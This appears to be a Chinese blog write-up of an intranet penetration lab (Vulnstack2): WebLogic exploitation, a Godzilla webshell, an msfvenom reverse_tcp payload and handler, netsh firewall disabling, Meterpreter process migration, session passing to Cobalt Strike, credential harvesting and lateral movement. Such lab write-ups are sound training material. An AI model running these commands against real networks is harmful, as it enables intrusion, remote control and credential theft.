526互联

vulnstack2靶场记录

发布时间 2023-10-24 20:46:23作者: Icfh

内网渗透:Vulnstack2靶场记录

环境配置

  • web机恢复快照至v1.3

  • 在VMWare上开一张新的虚拟网卡,网段为10.10.10.0/24

  • 检测连通性:在192.168.208.0/24网段下,Kali一开始死活ping不通web和PC,解决方案:

    • 允许防火墙进行ICMP回显
      • netsh firewall set icmpsetting 8:允许被ping
    • 关闭手动配置IP,让DHCP自动分配

  • 在检测完连通性后,再一次开启防火墙禁ping策略

    • netsh firewall set icmpsetting 8 disable

  • IP配置:

主机 IP地址 所在功能区
web 内网:10.10.10.80 外网:192.168.208.163 DMZ
PC 内网:10.10.10.201 外网:192.168.208.162
DC 域控、DNS服务器 10.10.10.10 核心区
Kali 攻击机 192.168.208.161 外网

  • 网络拓扑:

    图片来自红日靶场官网

img

外网信息收集

nmap 192.168.208.0/24

image-20231006163003185

162、163这两台机器上都有不少开放端口

在163机器上开放了:

445:Microsoft-DS是微软的补丁,是445端口的,可以拒绝服务攻击漏洞。

3389:3389端口是Windows 2000(2003) Server远程桌面的服务端口

7001:Oracle Weblogic Server的默认端口

  • 这很明显就是要打weblogic,拿weblogicscanner进行一波漏洞扫描

image-20231007150842990

  • 拿CVE打,工具直接一梭哈

image-20231007150940435

  • 紧接着传马,关于weblogic的上传木马问题是有讲究的,具体查看如下:https://www.adminxe.com/2604.html

    tree /f .查看当前目录及其子目录的所有文件,找到一个合适的文件上传点

    jsp木马的生成可以利用哥斯拉的生成模块

    image-20231007151320808

  • 哥斯拉连接webshell,直接de1ay\administrator,这预示着web机拿下了

image-20231007150721201

  • 想用msf做个反弹shell,没成功?估计有杀软

image-20231014140807784

查看主机当前运行的进程:

wmic process list brief

将结果扔入Chatgpt分析,确实有杀软ZhuDongFangYu.exe,为360的主动防御杀软

(也可以使用https://saucer-man.com/avlist/index.html查找杀软进程,如下图)

image-20231022195505344

关闭防火墙

Windows server 2003及之前版本:
netsh firewall set opmode disable    #关闭  
netsh firewall set opmode enable     #开启
Windows server 2003之后版本:
netsh advfirewall set allprofiles state off    #关闭    
netsh advfirewall set allprofiles state on     #开启

哥斯拉协助MSF上线 & 哥斯拉一键式提权

  • 使用msfveom生成可执行程序
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.208.161 lport=6677 -f exe -o msfshell.exe

使用哥斯拉上传文件该msfshell.exe

  • 部署msf监听
use exploit/multi/handler
# 使用payload类型  windows的反弹shell
set payload windows/meterpreter/reverse_tcp
# 选择接收地址
set lhost 192.168.208.161
# 选择监听端口
set lport 6677
# 运行
run
  • 使用哥斯拉上线MSF

image-20231022212125198

image-20231022212153580

getsystem但是还是没办法提权。。。麻了啊

image-20231022225212115

  • 后来发现哥斯拉能够一键式帮忙提权:

image-20231023134505988

至此外网机拿下

MSF进程迁移提权

正常使用exe上线msf时,会在任务管理器或者tasklist命令中看到我们的木马进程。

进程迁移大致原理是通过将木马进程绑定到系统已有进程上(且最好是高权限进程),达到寄生的目的。

image-20231024104221841

手动迁移

msf中查看当前所有进程:ps

查看当前进程:getpid

然后进程迁移:

# 指定进程名进行迁移
migrate -N ProcessName
# 指定进程号进行迁移
migrate PID

可以发现进程迁移后为:

image-20231024104626254

自动迁移

# 迁移到指定进程
set autorunscript migrate -n ProcessName

# 自动迁移到进程
set AytoRunScript migrate -f

# 上线msf, 并且运行后台
exploit -j -z

MSF派生CS上线

这里的情景是我已经通过msf进行提权,但是想cs上线,用cs上线那一套都不好使。

解决方案:使用msf提权获取的session,派生到cs上。

这里的坑点是msf中的payload类型应该和cs中监听器的类型匹配。

具体可以参考:https://maidang.cool/2021/9930.html

  • 保存session:

image-20231024180455295

  • 设置监听器

image-20231024180944882

  • msf的session派生到cs上
use exploit/windows/local/payload_inject
# 注意和监听器要匹配
set payload windows/meterpreter/reverse_http
# 设置CS listenner的ip和port
set lhost 192.168.208.161
set lport 8011
# 设置msf不接收session
set disablepayloadhandler true
set session
run

可以观察到CS上线

image-20231024180655632

内网渗透

票据提取

直接CS一把梭了,点击某台机器右键,可以进行很多信息收集

image-20231024190628277

可以在View中的Credentials中查看到汇总票据

image-20231024190659777

横向移动

查看域成员:shell net user /domain

6,估计是不知道重装的时候环境搞崩了还是,无所谓,我选择摆烂下班

image-20231024202025811

  • 反正大致思路,就是CS一把梭,跳板机层层跳就行,

image-20231024191251804

​ 选对session就行

image-20231024191308758

环境,懒得搞了。

思考

我在打靶场的时候,绕杀软绕了很久,这里描述一下我的思路历程:

  1. 手动删杀软,动静太大,而且能否杀干净是一回事。
  2. 360有手就行?可是我还不会免杀,网上找的几个免杀都很鸡肋
  3. 哥斯拉一键提权,挺好,但是操作很鸡肋。
  4. 最后成功的思路:首先在低权限下关闭防火墙,进程迁移提权,msf上线,msf派生cs上线,最后在cs上打后渗透工作(虽然最后因为环境问题连域都连接不上...

参考

  1. 免杀思路:https://lf2022.cn/2022/12/8501/

  2. 利用环境变量过免杀:https://hacked.cool/archives/342/

  3. https://blog.csdn.net/weixin_47533648/article/details/121356829